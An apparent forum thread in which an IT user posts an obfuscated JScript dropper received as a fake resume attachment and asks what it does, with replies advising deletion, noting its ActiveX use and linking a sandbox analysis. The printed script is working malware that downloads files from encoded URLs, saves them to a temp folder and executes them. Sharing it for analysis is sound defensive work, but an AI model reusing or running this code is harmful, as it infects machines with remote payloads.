Malicious javascript pretending to be a resume: What does this script do?

Hi guys,

I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn

Open in new window

My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew
defectaAsked:
Who is Participating?

[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

JohnBusiness Consultant (Owner)Commented:
I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.
0
defectaAuthor Commented:
I appreciate that, and I do too but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.

I would really appreciate some insight into what the purpose of this script is and what it's trying to do.

I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?

Cheers.
0
Dave BaldwinFixer of ProblemsCommented:
It appears to be attempting to load an ActiveX component which, depending on your Windows security, can potentially do just about anything.  The most likely thing is loading viruses and malware off the internet to infect the machine that it is run on.
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Determine the Perfect Price for Your IT Services

Do you wonder if your IT business is truly profitable or if you should raise your prices? Learn how to calculate your overhead burden with our free interactive tool and use it to determine the right price for your IT services. Download your free eBook now!

defectaAuthor Commented:
Thanks Dave.

Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
0
Dave BaldwinFixer of ProblemsCommented:
I don't know.  I saw this part...
var GkqB = new ActiveXObject(

Open in new window

which declares a new ActiveXObject but since most of the javascript is encoded (and I won't run it to decode it), I can't tell where it is going to get it.

I just noticed another ActiveXObject in the first line of the script.
0
Scott Fell, EE MVEDeveloper & EE ModeratorCommented:
I uploaded the file to malwr.com to check out  https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
JavaScript

From novice to tech pro — start learning today.